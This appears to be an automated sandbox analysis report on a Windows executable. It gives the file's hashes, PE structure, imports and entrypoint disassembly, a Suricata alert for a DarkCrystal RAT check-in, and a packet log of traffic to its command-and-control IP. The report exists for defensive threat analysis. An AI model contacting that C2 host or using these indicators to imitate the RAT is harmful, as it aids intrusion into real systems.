                                                                                                                      Preview:..Pinging 061544 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):7.5105013201167505
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:8k1e14tjcx.exe
                                                                                                                      File size:2'365'778 bytes
                                                                                                                      MD5:517d21cbe45c2a88930aa345c2a5c36b
                                                                                                                      SHA1:f8c2b259ed15eb455fc345f54a9ef9b0aace552c
                                                                                                                      SHA256:4b9cb0b6b953edda63999ddd41656c7c509cfb02298eaac8929010c29971cec9
                                                                                                                      SHA512:b912bf7ea3fc0e929890ce6048e89ab797b0ebf4b54e87989bdf4f2eb06cb68e1accd52200105c1079336ba57525aa200cd48c769e24ce1827906948d6f28d3f
                                                                                                                      SSDEEP:49152:IBJQcFZTdUJWxOOZPHst87uOLOkMRxJgSrSmMsce:yOczpGWdZPHu9WuRx9rrJT
                                                                                                                      TLSH:65B5BE0665D24F33C2746A318667023D53A0D7663B12EB4F7A1F20D6A917BF18A726F3
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                                                                      File Icon

                                                                                                                      Icon Hash:1515d4d4442f2d2d

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x41f530
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:5
                                                                                                                      OS Version Minor:1
                                                                                                                      File Version Major:5
                                                                                                                      File Version Minor:1
                                                                                                                      Subsystem Version Major:5
                                                                                                                      Subsystem Version Minor:1
                                                                                                                      Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      call 00007FDB3D394A5Bh
                                                                                                                      jmp 00007FDB3D39436Dh
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push esi
                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                      mov esi, ecx
                                                                                                                      call 00007FDB3D3871B7h
                                                                                                                      mov dword ptr [esi], 004356D0h
                                                                                                                      mov eax, esi
                                                                                                                      pop esi
                                                                                                                      pop ebp
                                                                                                                      retn 0004h
                                                                                                                      and dword ptr [ecx+04h], 00000000h
                                                                                                                      mov eax, ecx
                                                                                                                      and dword ptr [ecx+08h], 00000000h
                                                                                                                      mov dword ptr [ecx+04h], 004356D8h
                                                                                                                      mov dword ptr [ecx], 004356D0h
                                                                                                                      ret
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push esi
                                                                                                                      mov esi, ecx
                                                                                                                      lea eax, dword ptr [esi+04h]
                                                                                                                      mov dword ptr [esi], 004356B8h
                                                                                                                      push eax
                                                                                                                      call 00007FDB3D3977FFh
                                                                                                                      test byte ptr [ebp+08h], 00000001h
                                                                                                                      pop ecx
                                                                                                                      je 00007FDB3D3944FCh
                                                                                                                      push 0000000Ch
                                                                                                                      push esi
                                                                                                                      call 00007FDB3D393AB9h
                                                                                                                      pop ecx
                                                                                                                      pop ecx
                                                                                                                      mov eax, esi
                                                                                                                      pop esi
                                                                                                                      pop ebp
                                                                                                                      retn 0004h
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      sub esp, 0Ch
                                                                                                                      lea ecx, dword ptr [ebp-0Ch]
                                                                                                                      call 00007FDB3D387132h
                                                                                                                      push 0043BEF0h
                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                      push eax
                                                                                                                      call 00007FDB3D3972B9h
                                                                                                                      int3
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      sub esp, 0Ch
                                                                                                                      lea ecx, dword ptr [ebp-0Ch]
                                                                                                                      call 00007FDB3D394478h
                                                                                                                      push 0043C0F4h
                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                      push eax
                                                                                                                      call 00007FDB3D39729Ch
                                                                                                                      int3
                                                                                                                      jmp 00007FDB3D398D37h
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      push 00422900h
                                                                                                                      push dword ptr fs:[00000000h]

                                                                                                                      Rich Headers

                                                                                                                      Programming Language:
                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                      • [IMP] VS2008 SP1 build 30729

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                                      PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                                      RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                                                                      RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                                                                      RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                                                                      RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                                                                      RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                                                                      RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                                                                      RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                                                                      RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                                                                                      RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                                                                                      RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                                                                                      RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                                                                                      RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                                                                                      RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                                                                                      RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                                                                                      RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                                                                                      RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                                                                                      RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                                                                                      RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                                                                                      RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                                                                                      RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                                                                                      RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                                                                                      RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                                                                                      RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                                                                                      RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                                                                                      RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                                                      OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                                      gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                                                      Possible Origin

                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      EnglishUnited States

                                                                                                                      Network Behavior

                                                                                                                      Suricata IDS Alerts

                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2024-12-20T21:17:27.910497+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973237.44.238.25080TCP

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 20, 2024 21:17:26.459976912 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:26.582166910 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:26.582243919 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:26.583430052 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:26.704358101 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:26.942862988 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:27.062717915 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:27.859644890 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:27.910496950 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:27.932555914 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:27.932585955 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:27.932683945 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:28.087202072 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:28.204565048 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:28.207077026 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:28.328254938 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:28.328397989 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:28.328624010 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:28.444823027 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:28.454293966 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:28.494035959 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:28.535470963 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:28.564409018 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:28.676296949 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:28.795989990 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:28.923033953 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:28.953802109 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:29.073435068 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:29.301213026 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:29.361124992 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:29.410502911 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:29.420838118 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:29.420860052 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:29.608760118 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:29.660481930 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:29.848563910 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:29.863013029 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:29.983280897 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.081082106 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.088712931 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:30.207930088 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:30.208157063 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.273545980 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.316737890 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:30.328037024 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.328047991 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.328057051 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.441862106 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:30.496216059 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.551136971 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:30.561573982 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.561588049 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.690798044 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.738595963 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:30.923456907 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.925278902 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:30.982057095 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:31.028789043 CET4973680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:31.044831991 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.103579998 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.103648901 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:31.148624897 CET804973637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.148716927 CET4973680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:31.148885965 CET4973680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:31.268357992 CET804973637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.270046949 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:31.333606958 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.379210949 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:31.389797926 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.389843941 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.504317999 CET4973680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:31.625309944 CET804973637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.625320911 CET804973637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.625459909 CET804973637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:32.047070980 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:32.049681902 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:32.169152975 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:32.395031929 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:32.419121027 CET804973637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:32.456074953 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:32.472965002 CET4973680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:32.504221916 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:32.514636040 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:32.514719963 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:32.656558990 CET804973637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:32.707339048 CET4973680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:32.982656002 CET4973680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:32.991168976 CET4973880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:33.103236914 CET804973637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.103281021 CET4973680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:33.110667944 CET804973837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.110728979 CET4973880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:33.110857964 CET4973880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:33.167135000 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.168375969 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:33.230403900 CET804973837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.288103104 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.462671995 CET4973880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:33.520263910 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:33.575042009 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.582345963 CET804973837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.582510948 CET804973837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.582520008 CET804973837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.639998913 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.640043020 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.692096949 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:34.292088985 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:34.293745995 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:34.381798983 CET804973837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:34.413388014 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:34.488605976 CET4973880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:34.616730928 CET804973837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:34.644938946 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:34.676129103 CET4973880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:34.700458050 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:34.764653921 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:34.764719963 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:34.785471916 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:35.417982101 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:35.418946028 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:35.538465023 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:35.769962072 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:35.829335928 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:35.889667034 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:35.889777899 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:35.988591909 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:36.549071074 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:36.598542929 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:36.718435049 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.005177021 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.024113894 CET4973880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.024547100 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.026977062 CET4974380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.144294977 CET804973837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.144362926 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.144391060 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.144438028 CET4973880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.146609068 CET804974337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.146688938 CET4974380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.146848917 CET4974380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.266330957 CET804974337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.504343033 CET4974380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.506726027 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.514307022 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.624257088 CET804974337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.624269962 CET804974337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.624380112 CET804974337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.634186029 CET804973237.44.238.250192.168.2.4
